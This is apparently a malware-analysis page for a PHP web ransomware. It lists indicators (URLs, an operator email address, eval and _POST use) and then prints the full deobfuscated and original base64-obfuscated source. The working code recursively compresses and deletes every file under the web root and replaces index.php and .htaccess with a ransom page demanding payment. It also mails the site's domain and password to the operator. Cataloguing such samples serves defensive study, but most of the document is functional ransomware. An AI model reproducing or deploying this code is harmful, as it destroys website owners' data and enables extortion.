PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
URLs
https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js
https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif
https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js
https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif
https://j.top4top.io/m_2297ddlfw0.mp3
https://j.top4top.io/m_2297ddlfw0.mp3
Emails
wann787vip@gmail.com
Title
Ransomware
Execution
eval
Input
_POST
Environment
set_time_limit
error_reporting

Deobfuscated code

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php 
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if (isset($_POST['pass'])) {
    function encfile($filename)
    {
        if (strpos($filename, '.crypt') !== false) {
            return;
        }
        file_put_contents($filename . ".crypt", gzdeflate(file_get_contents($filename), 9));
        unlink($filename);
        copy('.htaccess', '.htabackup');
        $file = "<title>Ransomware</title>\n     <meta charset='utf-8'/>\n<meta content='IE=edge' http-equiv='X-UA-Compatible'/>\n<meta name=\"theme-color\"content=\"black\">\n<meta name=\"description\"content=\"hacked by \">\n<script src=\"https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js\" type=\"text/javascript\"></script>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\" />\n        <meta property=\"og:image\" content=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU\">\n        \n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\">\n<style>\nbody { \t \ndisplay: flex;\n  align-items: center;\n  justify-content: center;\n  min-height: 100vh;\nbackground-image: url(\"https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif\");\ncolor:pink;\n    height:100%;\n    background-position: center;\n    background-repeat: no-repeat;\nbackground-size: 100% 100%;\nbackground-attachment:fixed;} \t\nbtnn{\nalign-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\n}\n</style>\n<font color=\"pink\">\n<?php\nerror_reporting(0);\n\$input = \$_POST['pass'];\n\$pass = \"gomen\";\nif(isset(\$input)) {\nif(md5(\$input) == \$pass) {\nfunction decfile(\$filename){\n\tif (strpos(\$filename, '.crypt') === FALSE) {\n\treturn;\n\t}\n\t\$decrypted = gzinflate(file_get_contents(\$filename));\n\tfile_put_contents(str_replace('.crypt', '', \$filename), \$decrypted);\n\tunlink('crypt.php');\n\tunlink('.htaccess');\n\tunlink(\$filename);\n\techo \"\$filename Decrypted !!!<br>\";\n}\n\nfunction decdir(\$dir){\n\t\$files = array_diff(scandir(\$dir), array('.', '..'));\n\t\tforeach(\$files as \$file) {\n\t\t\tif(is_dir(\$dir.\"/\".\$file)){\n\t\t\t\tdecdir(\$dir.\"/\".\$file);\n\t\t\t}else {\n\t\t\t\tdecfile(\$dir.\"/\".\$file);\n\t\t}\n\t}\n}\n\ndecdir(\$_SERVER['DOCUMENT_ROOT']);\necho \"<br>Webroot Decrypted<br>\";\nunlink(\$_SERVER['PHP_SELF']);\nunlink('.htaccess');\ncopy('htabackup','.htaccess');\necho 'Success !!!';\n} else {\necho 'Failed Password !!!';\n}\nexit();\n}\n?>\n<center>\n<h1>Ransomware</h1>\n<br><br>\n<h3>Your Website Is Encrypted</h3>\n\n\nDon't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First\n<br>\nSend Me \$3 For Back Your Website <br><br>\n<br><br>\n<form enctype=\"multipart/form-data\" method=\"post\">\n    <br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: cover;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"text\" name=\"pass\" placeholder=\"Password\">\n<br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"submit\" value=\"Decrypt\">\n    <br>\n       <center>\n<br>\n<audio id=\"myAudio\" loop=\"1\">\n            <source src=\"\nhttps://j.top4top.io/m_2297ddlfw0.mp3\" type=\"audio/ogg\">\n            <source src=\"\nhttps://j.top4top.io/m_2297ddlfw0.mp3\" type=\"audio/mpeg\">\n        </audio>\n        <button onclick=\"playAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Play</button>       <button onclick=\"pauseAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Pause</button></center>\n        <script>\n              var x = document.getElementById(\"myAudio\"); \n\n              function playAudio() { \n                  x.play(); \n              } \n\n               function pauseAudio() { \n                  x.pause(); \n              } \n        </script>\n</form>\n<br>Contact Mail : wann787vip@gmail.com\n</font>";
        $q = str_replace('gomen', md5($_POST['pass']), $file);
        $w = str_replace('wann787vip@gmail.com', $_POST['email'], $q);
        $e = str_replace('hello', $_POST['btc'], $w);
        $r = str_replace('$3', '$' . $_POST['price'], $e);
        $dec = $r;
        $comp = "<?php eval('?>'.base64_decode('" . base64_encode($dec) . "'" . ").'<?php '); ?>";
        $hii = fopen('index.php', 'w');
        fwrite($hii, $comp);
        fclose($hii);
        $hta = "DirectoryIndex index.php\n\r\nErrorDocument 403 /index.php\n\r\nErrorDocument 404 /index.php\n\r\nErrorDocument 500 /index.php\n";
        $ht = fopen('.htaccess', 'w');
        fwrite($ht, $hta);
        fclose($ht);
        echo "{$filename} Encrypted !!!<br>";
    }
    function encdir($dir)
    {
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . "/" . $file)) {
                encdir($dir . "/" . $file);
            } else {
                encfile($dir . "/" . $file);
            }
        }
    }
    if (isset($_POST['pass'])) {
        encdir($_SERVER['DOCUMENT_ROOT']);
    }
    copy('index.php', $_SERVER['DOCUMENT_ROOT'] . '/index.php');
    copy('.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htaccess');
    copy($_SERVER['DOCUMENT_ROOT'] . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htabackup');
    $to = $_POST['wann787vip@gmail.com'];
    $subject = 'Your Ransomware Info';
    $message = "Domain : " . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n\n" . "Your Password : " . $_POST['pass'];
    if (mail($to, $subject, $message)) {
        echo "The password has been sent to your email";
    } else {
        echo "password was not sent to your email";
    }
    exit;
}
?>
</html>
<?php 
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
?>
<center>
<h1>Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php 
echo $_SERVER['SCRIPT_FILENAME'];
?></font><br>
Mail Function : <font color="red"><?php 
if (mail('wann787vip@gmail.com', 'tes', 'tes')) {
    echo "ON";
} else {
    echo "OFF";
}
?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>


Original code

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if(isset($_POST['pass'])) {
function encfile($filename){
	if (strpos($filename, '.crypt') !== false) {
    return;
	}
	file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9));
	unlink($filename);
copy('.htaccess','.htabackup');
$file = base64_decode("PHRpdGxlPlJhbnNvbXdhcmU8L3RpdGxlPgogICAgIDxtZXRhIGNoYXJzZXQ9J3V0Zi04Jy8+CjxtZXRhIGNvbnRlbnQ9J0lFPWVkZ2UnIGh0dHAtZXF1aXY9J1gtVUEtQ29tcGF0aWJsZScvPgo8bWV0YSBuYW1lPSJ0aGVtZS1jb2xvciJjb250ZW50PSJibGFjayI+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uImNvbnRlbnQ9ImhhY2tlZCBieSAiPgo8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9idW5nZnJhbmdraS9lZmVrc2FsanUvMmE3ODA1YzcvZWZlay1zYWxqdS5qcyIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4KICAgICAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iIC8+CiAgICAgICAgPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwczovL2VuY3J5cHRlZC10Ym4wLmdzdGF0aWMuY29tL2ltYWdlcz9xPXRibjpBTmQ5R2NUSGlGSHNlWER6M0x3S1VHYmdpV2tLcTBBcXJ0azBYNmExVncmdXNxcD1DQVUiPgogICAgICAgIAo8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2ZvbnQtYXdlc29tZS80LjcuMC9jc3MvZm9udC1hd2Vzb21lLm1pbi5jc3MiPgo8c3R5bGU+CmJvZHkgeyAJIApkaXNwbGF5OiBmbGV4OwogIGFsaWduLWl0ZW1zOiBjZW50ZXI7CiAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgbWluLWhlaWdodDogMTAwdmg7CmJhY2tncm91bmQtaW1hZ2U6IHVybCgiaHR0cHM6Ly9jZG4ucHJpbnNoLmNvbS9kYXRhLTEvaW1hZ2VzL05hdGhhblByaW5zbGV5LXJhaW4tc2FkLmdpZiIpOwpjb2xvcjpwaW5rOwogICAgaGVpZ2h0OjEwMCU7CiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7CiAgICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwpiYWNrZ3JvdW5kLXNpemU6IDEwMCUgMTAwJTsKYmFja2dyb3VuZC1hdHRhY2htZW50OmZpeGVkO30gCQpidG5uewphbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsKfQo8L3N0eWxlPgo8Zm9udCBjb2xvcj0icGluayI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGlucHV0ID0gJF9QT1NUWydwYXNzJ107CiRwYXNzID0gImdvbWVuIjsKaWYoaXNzZXQoJGlucHV0KSkgewppZihtZDUoJGlucHV0KSA9PSAkcGFzcykgewpmdW5jdGlvbiBkZWNmaWxlKCRmaWxlbmFtZSl7CglpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCcpID09PSBGQUxTRSkgewoJcmV0dXJuOwoJfQoJJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsKCWZpbGVfcHV0X2NvbnRlbnRzKHN0cl9yZXBsYWNlKCcuY3J5cHQnLCAnJywgJGZpbGVuYW1lKSwgJGRlY3J5cHRlZCk7Cgl1bmxpbmsoJ2NyeXB0LnBocCcpOwoJdW5saW5rKCcuaHRhY2Nlc3MnKTsKCXVubGluaygkZmlsZW5hbWUpOwoJZWNobyAiJGZpbGVuYW1lIERlY3J5cHRlZCAhISE8YnI+IjsKfQoKZnVuY3Rpb24gZGVjZGlyKCRkaXIpewoJJGZpbGVzID0gYXJyYXlfZGlmZihzY2FuZGlyKCRkaXIpLCBhcnJheSgnLicsICcuLicpKTsKCQlmb3JlYWNoKCRmaWxlcyBhcyAkZmlsZSkgewoJCQlpZihpc19kaXIoJGRpci4iLyIuJGZpbGUpKXsKCQkJCWRlY2RpcigkZGlyLiIvIi4kZmlsZSk7CgkJCX1lbHNlIHsKCQkJCWRlY2ZpbGUoJGRpci4iLyIuJGZpbGUpOwoJCX0KCX0KfQoKZGVjZGlyKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10pOwplY2hvICI8YnI+V2Vicm9vdCBEZWNyeXB0ZWQ8YnI+IjsKdW5saW5rKCRfU0VSVkVSWydQSFBfU0VMRiddKTsKdW5saW5rKCcuaHRhY2Nlc3MnKTsKY29weSgnaHRhYmFja3VwJywnLmh0YWNjZXNzJyk7CmVjaG8gJ1N1Y2Nlc3MgISEhJzsKfSBlbHNlIHsKZWNobyAnRmFpbGVkIFBhc3N3b3JkICEhISc7Cn0KZXhpdCgpOwp9Cj8+CjxjZW50ZXI+CjxoMT5SYW5zb213YXJlPC9oMT4KPGJyPjxicj4KPGgzPllvdXIgV2Vic2l0ZSBJcyBFbmNyeXB0ZWQ8L2gzPgoKCkRvbid0IENoYW5nZSB0aGUgRmlsZW5hbWUgYmVjYXVzZSBpdCBDYW4gRGFtYWdlIHRoZSBGaWxlIElmIFlvdSBXYW50IHRvIFJldHVybiBZb3UgTXVzdCBFbnRlciB0aGUgUGFzc3dvcmQgRmlyc3QKPGJyPgpTZW5kIE1lICQzIEZvciBCYWNrIFlvdXIgV2Vic2l0ZSA8YnI+PGJyPgo8YnI+PGJyPgo8Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9InBvc3QiPgogICAgPGJyPgo8aW5wdXQgc3R5bGU9ImFsaWduLWl0ZW1zOiBjZW50ZXI7CiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsKICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OwogICAgYm9yZGVyOiAxcHggc29saWQgZ3JlZW47CiAgICBsZXR0ZXItc3BhY2luZzogMHB4OwogICAgY29sb3I6IHJlZDsKICAgIHdpZHRoOiBjb3ZlcjsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9InRleHQiIG5hbWU9InBhc3MiIHBsYWNlaG9sZGVyPSJQYXNzd29yZCI+Cjxicj4KPGlucHV0IHN0eWxlPSJhbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkRlY3J5cHQiPgogICAgPGJyPgogICAgICAgPGNlbnRlcj4KPGJyPgo8YXVkaW8gaWQ9Im15QXVkaW8iIGxvb3A9IjEiPgogICAgICAgICAgICA8c291cmNlIHNyYz0iCmh0dHBzOi8vai50b3A0dG9wLmlvL21fMjI5N2RkbGZ3MC5tcDMiIHR5cGU9ImF1ZGlvL29nZyI+CiAgICAgICAgICAgIDxzb3VyY2Ugc3JjPSIKaHR0cHM6Ly9qLnRvcDR0b3AuaW8vbV8yMjk3ZGRsZncwLm1wMyIgdHlwZT0iYXVkaW8vbXBlZyI+CiAgICAgICAgPC9hdWRpbz4KICAgICAgICA8YnV0dG9uIG9uY2xpY2s9InBsYXlBdWRpbygpIiBzdHlsZT0iYWxpZ24taXRlbXM6IGNlbnRlcjsKICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOwogICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7CiAgICBib3JkZXI6IDFweCBzb2xpZCBncmVlbjsKICAgIGxldHRlci1zcGFjaW5nOiAwcHg7CiAgICBjb2xvcjogcmVkOwogICAgd2lkdGg6IDYwcHg7CiAgICBoZWlnaHQ6IDI1cHg7CiAgICBwYWRkaW5nOiAwOwogICAgZm9udC1zaXplOiAxNXB4OwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7IiB0eXBlPSJidXR0b24iPlBsYXk8L2J1dHRvbj4gICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJwYXVzZUF1ZGlvKCkiIHN0eWxlPSJhbGlnbi1pdGVtczogY2VudGVyOwogICAganVzdGlmeS1jb250ZW50OiBjZW50ZXI7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsKICAgIGJvcmRlcjogMXB4IHNvbGlkIGdyZWVuOwogICAgbGV0dGVyLXNwYWNpbmc6IDBweDsKICAgIGNvbG9yOiByZWQ7CiAgICB3aWR0aDogNjBweDsKICAgIGhlaWdodDogMjVweDsKICAgIHBhZGRpbmc6IDA7CiAgICBmb250LXNpemU6IDE1cHg7CiAgICBmb250LXdlaWdodDogYm9sZDsiIHR5cGU9ImJ1dHRvbiI+UGF1c2U8L2J1dHRvbj48L2NlbnRlcj4KICAgICAgICA8c2NyaXB0PgogICAgICAgICAgICAgIHZhciB4ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm15QXVkaW8iKTsgCgogICAgICAgICAgICAgIGZ1bmN0aW9uIHBsYXlBdWRpbygpIHsgCiAgICAgICAgICAgICAgICAgIHgucGxheSgpOyAKICAgICAgICAgICAgICB9IAoKICAgICAgICAgICAgICAgZnVuY3Rpb24gcGF1c2VBdWRpbygpIHsgCiAgICAgICAgICAgICAgICAgIHgucGF1c2UoKTsgCiAgICAgICAgICAgICAgfSAKICAgICAgICA8L3NjcmlwdD4KPC9mb3JtPgo8YnI+Q29udGFjdCBNYWlsIDogd2Fubjc4N3ZpcEBnbWFpbC5jb20KPC9mb250Pg==");
$q = str_replace('gomen', md5($_POST['pass']), $file);
$w = str_replace('wann787vip@gmail.com', $_POST['email'], $q);
$e = str_replace('hello', $_POST['btc'], $w);
$r = str_replace('$3', '$'.$_POST['price'], $e);
$dec = $r;
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>";
$hii = fopen('index.php', 'w');
fwrite($hii, $comp);
fclose($hii);
$hta = "DirectoryIndex index.php\n
ErrorDocument 403 /index.php\n
ErrorDocument 404 /index.php\n
ErrorDocument 500 /index.php\n";
$ht = fopen('.htaccess', 'w');
fwrite($ht, $hta);
fclose($ht);
echo "$filename Encrypted !!!<br>";
}

function encdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				encdir($dir."/".$file);
			} else {
				encfile($dir."/".$file);
				
		}
	}
}

if(isset($_POST['pass'])){
	encdir($_SERVER['DOCUMENT_ROOT']);
}
copy('index.php', $_SERVER['DOCUMENT_ROOT'].'/index.php');
copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess');
copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
$to = $_POST['wann787vip@gmail.com'];
$subject = 'Your Ransomware Info';
$message = "Domain : ".$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']."\n\n"."Your Password : ".$_POST['pass'];
if(mail($to,$subject,$message)) {
echo 'The password has been sent to your email';
} else {
echo 'password was not sent to your email';
}
exit();
}
?>
</html>
<?php 
@ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8');


?>
<center>
<h1>Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br>
Mail Function : <font color="red"><?php if(mail('wann787vip@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>